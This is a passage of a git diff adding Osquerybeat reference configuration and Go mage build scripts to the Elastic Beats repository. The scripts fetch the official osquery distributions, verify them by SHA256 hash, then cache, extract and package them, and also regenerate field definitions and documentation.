Sets the UUID of the Elasticsearch cluster under which monitoring data for this +# Osquerybeat instance will appear in the Stack Monitoring UI. If output.elasticsearch +# is enabled, the UUID is derived from the Elasticsearch cluster referenced by output.elasticsearch. +#monitoring.cluster_uuid: + +# Uncomment to send the metrics to Elasticsearch. Most settings from the +# Elasticsearch output are accepted here as well. +# Note that the settings should point to your Elasticsearch *monitoring* cluster. +# Any setting that is not set is automatically inherited from the Elasticsearch +# output configuration, so if you have the Elasticsearch output configured such +# that it is pointing to your Elasticsearch monitoring cluster, you can simply +# uncomment the following line. +#monitoring.elasticsearch: + +# ============================== Instrumentation =============================== + +# Instrumentation support for the osquerybeat. +#instrumentation: + # Set to true to enable instrumentation of osquerybeat. + #enabled: false + + # Environment in which osquerybeat is running on (eg: staging, production, etc.) + #environment: "" + + # APM Server hosts to report instrumentation results to. + #hosts: + # - http://localhost:8200 + + # API Key for the APM Server(s). + # If api_key is set then secret_token will be ignored. + #api_key: + + # Secret token for the APM Server(s). + #secret_token: + + +# ================================= Migration ================================== + +# This allows to enable 6.7 migration aliases +#migration.6_to_7.enabled: true + diff --git a/x-pack/osquerybeat/scripts/mage/config.go b/x-pack/osquerybeat/scripts/mage/config.go new file mode 100644 index 00000000000..1d3e773d602 --- /dev/null +++ b/x-pack/osquerybeat/scripts/mage/config.go @@ -0,0 +1,23 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package mage + +import ( + devtools "github.com/elastic/beats/v7/dev-tools/mage" +) + +// XPackConfigFileParams returns the configuration of sample and reference configuration data. +func XPackConfigFileParams() devtools.ConfigFileParams { + p := devtools.DefaultConfigFileParams() + p.Templates = append(p.Templates, "_meta/config/*.tmpl") + p.ExtraVars = map[string]interface{}{ + "ExcludeConsole": false, + "ExcludeFileOutput": true, + "ExcludeKafka": true, + "ExcludeRedis": true, + "UseDockerMetadataProcessor": false, + } + return p +} diff --git a/x-pack/osquerybeat/scripts/mage/distro.go b/x-pack/osquerybeat/scripts/mage/distro.go new file mode 100644 index 00000000000..e91cad2a3f5 --- /dev/null +++ b/x-pack/osquerybeat/scripts/mage/distro.go @@ -0,0 +1,163 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package mage + +import ( + "errors" + "fmt" + "io/ioutil" + "log" + "os" + "path/filepath" + "strings" + + devtools "github.com/elastic/beats/v7/dev-tools/mage" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/fetch" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/fileutil" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/hash" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/tar" +) + +// FetchOsqueryDistros fetches Osquery official distros as a part of the build +func FetchOsqueryDistros() error { + osnames := osNames(devtools.Platforms) + log.Printf("Fetch Osquery distros for %v", osnames) + + for _, osname := range osnames { + spec, err := distro.GetSpec(osname) + if err != nil { + return err + } + + fetched, err := checkCacheAndFetch(osname, spec) + if err != nil { + return err + } + + ifp := spec.DistroFilepath(distro.DataInstallDir) + installFileExists, eerr := fileutil.FileExists(ifp) + if eerr != nil { + log.Printf("Failed to check if %s exists, %v", ifp, err) + } + // If the new distro is fetched extract osqueryd if allowed according to the spec + // Currently the only supported is tar.gz extraction. + // There is no good Go library for extraction the cpio compressed "Payload" from Mac OS X .pkg, + // the few that I tried are limited and do not work. Maybe something to write for fun when time. + // The MSI is tricky as well to do the crossplatform extraction, no good Go library. + // So for Mac OS and Winderz the whole distro package is included and extracted + // on the first run on the platform for now. + if fetched || !installFileExists { + err = extractOrCopy(osname, spec) + if err != nil { + return err + } + } + } + return nil +} + +func osNames(platforms devtools.BuildPlatformList) []string { + mp := make(map[string]struct{}) + + for _, platform := range platforms { + name := platform.Name + if idx := strings.Index(name, "/"); idx != -1 { + name = name[:idx] + } + mp[name] = struct{}{} + } + + res := make([]string, 0, len(mp)) + for name := range mp { + res = append(res, name) + } + return res +} + +func checkCacheAndFetch(osname string, spec distro.Spec) (fetched bool, err error) { + dir := distro.DataCacheDir + if err = os.MkdirAll(dir, 0750); err != nil { + return false, fmt.Errorf("failed to create dir %v, %w", dir, err) + } + + var fileHash string + url := spec.URL(osname) + fp := spec.DistroFilepath(dir) + specHash := spec.SHA256Hash + + // Check if file already exists in the cache + f, err := os.Open(fp) + if err != nil { + if !os.IsNotExist(err) { + return false, err + } + } + + // File exists, check hash + if f != nil { + log.Print("Cached file found: ", fp) + fileHash, err = hash.Calculate(f, nil) + f.Close() + if err != nil { + return + } + + if fileHash == specHash { + log.Printf("Hash match, file: %s, hash: %s", fp, fileHash) + return + } + + log.Printf("Hash mismatch, expected: %s, got: %s.", specHash, fileHash) + } + + fileHash, err = fetch.Download(url, fp) + if err != nil { + log.Printf("File %s fetch failed, err: %v", url, err) + return + } + + if fileHash == specHash { + log.Printf("Hash match, file: %s, hash: %s", fp, fileHash) + return true, nil + } + log.Printf("Hash mismatch, expected: %s, got: %s. Fetch distro %s.", specHash, fileHash, url) + + return false, errors.New("osquery distro hash mismatch") +} + +func extractOrCopy(osname string, spec distro.Spec) error { + dir := distro.DataInstallDir + if err := os.MkdirAll(dir, 0750); err != nil { + return fmt.Errorf("failed to create dir %v, %w", dir, err) + } + + src := spec.DistroFilepath(distro.DataCacheDir) + + // Include the official osquery msi installer for windows for now + // until we figure out a better way to crack it open during the build + if !spec.Extract { + dst := spec.DistroFilepath(dir) + log.Printf("Copy file %s to %s", src, dst) + return devtools.Copy(src, dst) + } + + // Extract osqueryd + if strings.HasSuffix(src, ".tar.gz") { + tmpdir, err := ioutil.TempDir(distro.DataDir, "") + if err != nil { + return err + } + defer os.RemoveAll(tmpdir) + + osdp := distro.OsquerydDistroPath() + if err := tar.ExtractFile(src, tmpdir, osdp); err != nil { + return err + } + + return devtools.Copy(filepath.Join(tmpdir, osdp), distro.OsquerydPath(dir)) + } + return fmt.Errorf("unsupported file: %s", src) +} diff --git a/x-pack/osquerybeat/scripts/mage/package.go b/x-pack/osquerybeat/scripts/mage/package.go new file mode 100644 index 00000000000..e91def855a7 --- /dev/null +++ b/x-pack/osquerybeat/scripts/mage/package.go @@ -0,0 +1,24 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package mage + +import ( + "path/filepath" + + devtools "github.com/elastic/beats/v7/dev-tools/mage" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro" +) + +func CustomizePackaging() { + for _, args := range devtools.Packages { + distFile := distro.OsquerydDistroPlatformFilename(args.OS) + + packFile := devtools.PackageFile{ + Mode: 0644, + Source: filepath.Join(distro.DataInstallDir, distFile), + } + args.Spec.Files[distFile] = packFile + } +} diff --git a/x-pack/osquerybeat/scripts/mage/update.go b/x-pack/osquerybeat/scripts/mage/update.go new file mode 100644 index 00000000000..468bdafbe0f --- /dev/null +++ b/x-pack/osquerybeat/scripts/mage/update.go @@ -0,0 +1,48 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package mage + +import ( + "github.com/magefile/mage/mg" + + devtools "github.com/elastic/beats/v7/dev-tools/mage" +) + +// Update target namespace. +type Update mg.Namespace + +// Aliases stores aliases for the targets. +var Aliases = map[string]interface{}{ + "update": Update.All, +} + +// All updates all generated content. +func (Update) All() { + mg.Deps(Update.Fields, Update.IncludeFields, Update.Config, Update.FieldDocs) +} + +// Config generates both the short and reference configs. +func (Update) Config() error { + return devtools.Config(devtools.ShortConfigType|devtools.ReferenceConfigType, XPackConfigFileParams(), ".") +} + +// Fields generates a fields.yml for the Beat. +func (Update) Fields() error { + return devtools.GenerateFieldsYAML() +} + +// FieldDocs collects all fields by provider and generates documentation for them. +func (Update) FieldDocs() error { + mg.Deps(Update.Fields) + + return devtools.Docs.FieldDocs("fields.yml") +} + +// IncludeFields generates include/fields.go by provider. +func (Update) IncludeFields() error { + mg.Deps(Update.Fields) + + return devtools.GenerateAllInOneFieldsGo() +}